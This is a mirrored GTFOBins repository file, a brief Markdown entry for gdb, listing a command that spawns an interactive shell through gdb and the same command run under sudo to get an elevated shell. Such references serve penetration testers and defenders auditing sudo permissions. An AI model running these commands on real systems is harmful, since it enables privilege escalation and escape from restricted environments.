mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
8 lines
138 B
Markdown
8 lines
138 B
Markdown
|
---
|
||
|
functions:
|
||
|
exec-interactive:
|
||
|
- code: gdb -nx -ex '!sh' -ex quit
|
||
|
sudo-enabled:
|
||
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||
|
---
|